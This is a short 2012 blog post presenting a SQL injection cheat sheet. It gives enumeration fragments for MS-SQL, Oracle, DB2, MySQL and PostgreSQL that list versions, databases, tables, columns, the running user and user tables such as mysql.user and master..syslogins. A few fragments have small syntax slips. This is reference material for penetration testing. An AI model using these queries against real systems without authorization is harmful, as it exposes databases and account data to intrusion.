Sql Injection Cheat Sheet
Posted on Tuesday, January 03, 2012 by Tenderfoot
| Common SQL Injection Commands for Backend Databases | |
| MS-SQL | |
| Grab version | @@version |
| Users | name FROM master..syslogins |
| Tables | name FROM master..sysobjects WHERE xtype = ‘U’ |
| Database | name FROM master..sysdatabases; |
| Columns | name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’) |
| Running User | DB_NAME() |
| Oracle | |
| Grab version | table v$version compare with ‘Oracle%’ |
| Users | * from dba_users |
| Tables | table_name from all_tables |
| Database | distinct owner from all_tables |
| Columns | column_name from all_tab_columns where table_name=‘<TABLENAME> |
| Running User | user from dual |
| IBM DB2 | |
| Grab version | Versionnumber from sysibm.sysversions; |
| Users | user from sysibm.sysdummy1 |
| Tables | name from sysibm.systables |
| Database | schemaname from syscat.schemata |
| Columns | name, tbname, coltype from sysibm.syscolumns |
| Running User | user from sysibm.sysdummy1 |
| MySQL | |
| Grab version | @@version |
| Users | * from mysql.user |
| Tables | table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| Database | distinct(db) FROM mysql.db |
| Columns | table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’ |
| Running User | user() |
| PostgreSQL | |
| Grab version | version() |
| Users | * from pg_user |
| Database | datname FROM pg_database |
| Running User | user; |
Subscribe to:
Post Comments (Atom)
No Response to "Sql Injection Cheat Sheet"
Leave A Reply